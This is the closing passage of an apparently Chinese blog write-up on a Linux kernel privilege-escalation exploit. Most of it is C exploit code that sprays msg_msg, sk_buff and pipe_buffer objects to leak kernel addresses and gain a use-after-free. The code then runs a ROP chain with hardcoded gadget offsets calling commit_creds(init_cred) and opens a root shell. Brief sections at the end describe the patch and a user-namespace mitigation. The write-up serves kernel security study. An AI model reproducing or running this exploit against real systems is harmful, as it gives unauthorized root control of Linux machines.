    if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
        goto ret;

    puts("[*] Spraying fake secondary messages...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Leaking adjacent secondary message...");
    if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
        goto ret;

    if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
    {
        printf("[-] Could not leak adjacent secondary message");
        goto ret;
    }

    msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
    kheap = msg->m_list_next; // kheap pointer to the primary message
    if (kheap & (PRIMARY_SIZE - 1))
        kheap = msg->m_list_prev;
    printf("[+] kheap = %#" PRIx64 "\n", kheap);

    puts("[*] Freeing skb...");
    if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Spraying fake secondary messages...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Leaking address of msg_fake");
    if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
        goto ret;

    if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
    {
        printf("[-] Could not leak address of msg_fake\n");
        goto ret;
    }

    msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
    msg_fake_addr = msg->m_list_next;
    if (msg_fake_addr & (SECONDARY_SIZE - 1))
        msg_fake_addr = msg->m_list_prev;
    msg_fake_addr -= SECONDARY_SIZE;
    printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);

    puts("[*] Free secondary message and then gain UAF controlled by skb");
    if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
        goto ret;

    puts("[*] Spraying pipe_buffer objects...");
    for (int i = 0; i < NUM_PIPEFDS; i++)
    {
        if (pipe(pipefd[i]) < 0)
        {
            perror("[-] pipe");
            goto ret;
        }

        if (write(pipefd[i][1], "xi4oyu", 6) < 0)
        {
            perror("[-] write");
            goto ret;
        }
    }

    puts("[*] Leaking and freeing pipe_buffer object...");
    for (int i = 0; i < NUM_SOCKETS; i++)
    {
        for (int j = 0; j < NUM_SKBUFFS; j++)
        {
            if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
            {
                perror("[-] read");
                goto ret;
            }

            if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
            {
                pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
                // break; // free all
            }
        }
    }

    kernel_offset = pipe_buffer_ops - 0xffffffff8223e140; // anon_pipe_buf_ops
    kernel_base = kernel_offset + 0xffffffff81000000;
    printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
    printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
    printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);

    puts("[*] Spraying fake pipe_buffer...");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    buf = (struct pipe_buffer *)secondary_buf;
    buf->ops = msg_fake_addr + 0x200;
    ops = (struct pipe_buf_operations *)&secondary_buf[0x200];

    ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]

    *(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9;    // add rsp, 0xd0 ; ret
    *(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0; // pop rsp ; ret
    rop = (uint64_t *)&secondary_buf[0xd0 + 8];
    ridx = 0;
    rop[ridx++] = kernel_offset + 0xffffffff8108c650; // pop rdi ; ret
    rop[ridx++] = kernel_offset + 0xffffffff8286b780; // init_cred
    rop[ridx++] = kernel_offset + 0xffffffff810c9f00; // commit_creds
    rop[ridx++] = kernel_offset + 0xffffffff8108c5bc; // mov rsp, rbp ; pop rbp ; ret

    if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
        goto ret;

    puts("[*] Releasing pipe_buffer objects...");
    for (int i = 0; i < NUM_PIPEFDS; i++)
    {
        if (close(pipefd[i][0]) < 0)
        {
            perror("[-] close");
            goto ret;
        }
        if (close(pipefd[i][1]) < 0)
        {
            perror("[-] close");
            goto ret;
        }
    }

    getRootShell();

ret:
    for (int i = 0; i < NUM_MSQIDS; i++)
    {
        if (msqid[i] < 0)
            continue;

        if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
            perror("[-] msgctl rmid");
    }

    return 0;
}

漏洞修复

漏洞的修复很粗暴，就直接把 memset 这部分给去掉了，具体看 patch

还有个缓解措施是，禁用用户命名空间的功能来阻止普通用户拿到 CAP_NET_ADMIN 权限，参考：

echo 0 > /proc/sys/user/max_user_namespaces

总结

从溢出写 0 到 UAF 这里非常的巧妙，随后的 skb 和 pipe_buffer 结合利用 UAF 的思路应该是十分具备参考性的，非常值得学习

文中未明确提到的参考：